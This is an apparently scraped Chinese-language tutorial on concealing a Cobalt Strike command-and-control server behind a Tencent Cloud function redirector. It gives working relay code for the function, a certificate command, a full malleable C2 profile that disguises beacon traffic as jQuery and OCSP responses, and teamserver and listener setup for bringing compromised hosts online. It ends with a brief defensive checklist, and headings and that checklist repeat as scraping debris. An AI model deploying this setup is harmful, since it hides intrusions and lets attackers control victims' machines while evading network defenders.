云函数隐藏C2技术实现指南<\/h1>

一、技术原理概述<\/h2>

云函数隐藏C2的核心原理是通过腾讯云函数作为中间代理，实现攻击者真实C2服务器的隐藏：<\/p>

受害者主机 -> 腾讯云API网关 -> 云函数(Python脚本) -> 真实C2服务器<\/li>

所有通信流量在受害者看来都是与腾讯云官方地址进行的，有效隐藏了真实C2服务器IP<\/li> <\/ol>

二、环境准备<\/h2>

1. 腾讯云函数配置<\/h3>

登录腾讯云控制台，进入"云函数"服务<\/li>

选择"函数服务"->"函数管理"->"新建"->"自定义创建"<\/li> <\/ul>

2. Cobalt Strike环境<\/h3>

准备Cobalt Strike 4.3版本服务器<\/li>

准备可用的VPS作为C2服务器<\/li> <\/ul>

三、详细实施步骤<\/h2>

1. 云函数代码部署<\/h3>

# -*- coding: utf8 -*-<\/span>
<\/span><\/span>import<\/span> json,<\/span> requests,<\/span> base64
<\/span><\/span>
<\/span><\/span>def<\/span> main_handler<\/span>(event, context):
<\/span><\/span>    C2 =<\/span> 'http:\/\/<C2服务器地址>'<\/span>  # 根据实际使用HTTP\/HTTPS填写<\/span>
<\/span><\/span>    
<\/span><\/span>    path =<\/span> event['path'<\/span>]
<\/span><\/span>    headers =<\/span> event['headers'<\/span>]
<\/span><\/span>    print(event)
<\/span><\/span>    
<\/span><\/span>    if<\/span> event['httpMethod'<\/span>] ==<\/span> 'GET'<\/span>:
<\/span><\/span>        resp =<\/span> requests.<\/span>get(C2+<\/span>path, headers=<\/span>headers, verify=<\/span>False<\/span>)
<\/span><\/span>    else<\/span>:
<\/span><\/span>        resp =<\/span> requests.<\/span>post(C2+<\/span>path, data=<\/span>event['body'<\/span>], headers=<\/span>headers, verify=<\/span>False<\/span>)
<\/span><\/span>    
<\/span><\/span>    print(resp.<\/span>headers)
<\/span><\/span>    print(resp.<\/span>content)
<\/span><\/span>    
<\/span><\/span>    response =<\/span> {
<\/span><\/span>        "isBase64Encoded"<\/span>: True<\/span>,
<\/span><\/span>        "statusCode"<\/span>: resp.<\/span>status_code,
<\/span><\/span>        "headers"<\/span>: dict(resp.<\/span>headers),
<\/span><\/span>        "body"<\/span>: str(base64.<\/span>b64encode(resp.<\/span>content))[2<\/span>:-<\/span>1<\/span>]
<\/span><\/span>    }
<\/span><\/span>    return<\/span> response
<\/span><\/span><\/code><\/pre>关键点说明<\/strong>：<\/p>

C2<\/code>变量必须与后续CS profile配置一致<\/li>
代码实现了请求转发和响应返回的完整代理功能<\/li>
所有通信内容都经过Base64编码<\/li>
<\/ul>
2. 触发器配置<\/h3>

部署完代码后，进入"触发器管理"<\/li>
创建API网关触发器<\/li>
关键配置项：

路径设置为\/<\/code><\/li>
发布环境选择"发布"<\/li>
<\/ul>
<\/li>
测试API地址，确认云函数日志中有请求记录<\/li>
<\/ol>
3. Cobalt Strike证书生成<\/h3>
keytool -keystore cobaltStrike.store -storepass password -keypass password -genkey -keyalg RSA -alias baidu.com -dname "CN=ZhongGuo, OU=CC, O=CCSEC, L=BeiJing, ST=ChaoYang, C=CN"<\/span>
<\/span><\/span><\/code><\/pre>参数说明<\/strong>：<\/p>

-storepass<\/code>和-keypass<\/code>设置证书密码（后续profile中需要使用）<\/li>
-alias<\/code>设置证书别名<\/li>
-dname<\/code>设置证书详细信息（可自定义）<\/li>
<\/ul>
4. Cobalt Strike Profile配置<\/h3>
set sample_name "kris_abao"<\/span>;<\/span>
<\/span><\/span>set sleeptime "3000"<\/span>;<\/span>
<\/span><\/span>set jitter "0"<\/span>;<\/span>
<\/span><\/span>set maxdns "255"<\/span>;<\/span>
<\/span><\/span>set useragent "Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/96.0.4664.110 Safari\/537.36"<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>https-<\/span>certificate {<\/span>
<\/span><\/span>    set keystore "cobaltStrike.store"<\/span>;<\/span>
<\/span><\/span>    set password "Mm0000.."<\/span>;<\/span>
<\/span><\/span>    set C "US"<\/span>;<\/span>
<\/span><\/span>    set CN "jquery.com"<\/span>;<\/span>
<\/span><\/span>    set O "jQuery"<\/span>;<\/span>
<\/span><\/span>    set OU "Certificate Authority"<\/span>;<\/span>
<\/span><\/span>    set validity "365"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>http-<\/span>get {<\/span>
<\/span><\/span>    set uri "\/api\/getit"<\/span>;<\/span>
<\/span><\/span>    client {<\/span>
<\/span><\/span>        header "Accept"<\/span>;<\/span>
<\/span><\/span>        metadata {<\/span>
<\/span><\/span>            base64;<\/span>
<\/span><\/span>            prepend "SESSIONID="<\/span>;<\/span>
<\/span><\/span>            header "Cookie"<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    server {<\/span>
<\/span><\/span>        header "Content-Type"<\/span> "application\/ocsp-response"<\/span>;<\/span>
<\/span><\/span>        header "content-transfer-encoding"<\/span> "binary"<\/span>;<\/span>
<\/span><\/span>        header "Server"<\/span> "Nodejs"<\/span>;<\/span>
<\/span><\/span>        output {<\/span>
<\/span><\/span>            base64;<\/span>
<\/span><\/span>            print;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>http-<\/span>stager {<\/span>
<\/span><\/span>    set uri_x86 "\/vue.min.js"<\/span>;<\/span>
<\/span><\/span>    set uri_x64 "\/bootstrap-2.min.js"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>http-<\/span>post {<\/span>
<\/span><\/span>    set uri "\/api\/postit"<\/span>;<\/span>
<\/span><\/span>    client {<\/span>
<\/span><\/span>        header "Accept"<\/span>;<\/span>
<\/span><\/span>        id {<\/span>
<\/span><\/span>            base64;<\/span>
<\/span><\/span>            prepend "JSESSION="<\/span>;<\/span>
<\/span><\/span>            header "Cookie"<\/span>;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        output {<\/span>
<\/span><\/span>            base64;<\/span>
<\/span><\/span>            print;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    server {<\/span>
<\/span><\/span>        header "Content-Type"<\/span> "application\/ocsp-response"<\/span>;<\/span>
<\/span><\/span>        header "content-transfer-encoding"<\/span> "binary"<\/span>;<\/span>
<\/span><\/span>        header "Connection"<\/span> "keep-alive"<\/span>;<\/span>
<\/span><\/span>        output {<\/span>
<\/span><\/span>            base64;<\/span>
<\/span><\/span>            print;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>关键配置说明<\/strong>：<\/p>


URI配置<\/strong>：<\/p>

http-get<\/code>和http-post<\/code>的uri必须与云函数代码中的路径对应<\/li>
示例中使用\/api\/getit<\/code>和\/api\/postit<\/code><\/li>
<\/ul>
<\/li>

通信编码<\/strong>：<\/p>

所有通信数据都使用Base64编码<\/li>
确保云函数和CS profile的编码方式一致<\/li>
<\/ul>
<\/li>

HTTP头配置<\/strong>：<\/p>

配置了合法的Content-Type和其他头信息<\/li>
模拟正常Web服务的响应特征<\/li>
<\/ul>
<\/li>

证书配置<\/strong>：<\/p>

指向之前生成的cobaltStrike.store<\/code>文件<\/li>
密码必须与生成证书时设置的密码一致<\/li>
<\/ul>
<\/li>
<\/ol>
5. 启动Cobalt Strike服务器<\/h3>
.\/teamserver <vpsip> <password> c2.profile
<\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p>

将证书文件和profile文件放在同一目录<\/li>
确保服务器防火墙放行相应端口<\/li>
<\/ul>
6. 创建监听器<\/h3>

在Cobalt Strike客户端创建新的监听器<\/li>
关键配置<\/strong>：

只能选择80(HTTP)或443(HTTPS)端口<\/li>
监听类型必须与云函数中配置的C2地址协议一致<\/li>
监听地址填写云函数API网关地址<\/li>
<\/ul>
<\/li>
<\/ol>
四、测试与验证<\/h2>

生成Payload并执行<\/li>
观察云函数日志，确认有流量通过<\/li>
在Cobalt Strike的Web日志中查看请求记录<\/li>
确认上线情况<\/li>
<\/ol>
常见问题排查<\/strong>：<\/p>

如果无法上线，检查：

云函数日志是否有请求记录<\/li>
CS服务器日志是否有错误<\/li>
协议和端口配置是否一致<\/li>
证书密码是否正确<\/li>
<\/ol>
<\/li>
<\/ul>
五、技术要点总结<\/h2>


隐蔽性优势<\/strong>：<\/p>

所有通信都通过腾讯云官方地址进行<\/li>
有效隐藏真实C2服务器IP<\/li>
可利用腾讯云的CDN基础设施<\/li>
<\/ul>
<\/li>

配置关键点<\/strong>：<\/p>

云函数代码中的C2地址必须真实有效<\/li>
CS profile的URI配置必须与代码匹配<\/li>
通信编码方式必须一致(Base64)<\/li>
监听器端口只能使用80\/443<\/li>
<\/ul>
<\/li>

扩展应用<\/strong>：<\/p>

可结合域名伪装进一步增强隐蔽性<\/li>
可配置多个云函数实现负载均衡<\/li>
可修改User-Agent等特征规避检测<\/li>
<\/ul>
<\/li>
<\/ol>
六、防御建议<\/h2>
对于防御方，检测此类攻击可关注：<\/p>

异常访问腾讯云API地址的行为<\/li>
Base64编码的异常通信内容<\/li>
不匹配的HTTP头信息<\/li>
可疑的证书信息<\/li>
<\/ol>

云函数隐藏C2技术实现指南<\/h1>

二、环境准备<\/h2>

三、详细实施步骤<\/h2>

六、防御建议<\/h2> 对于防御方，检测此类攻击可关注：<\/p> 异常访问腾讯云API地址的行为<\/li> Base64编码的异常通信内容<\/li> 不匹配的HTTP头信息<\/li> 可疑的证书信息<\/li> <\/ol>

六、防御建议<\/h2>
对于防御方，检测此类攻击可关注：<\/p>

异常访问腾讯云API地址的行为<\/li>
Base64编码的异常通信内容<\/li>
不匹配的HTTP头信息<\/li>
可疑的证书信息<\/li> <\/ol>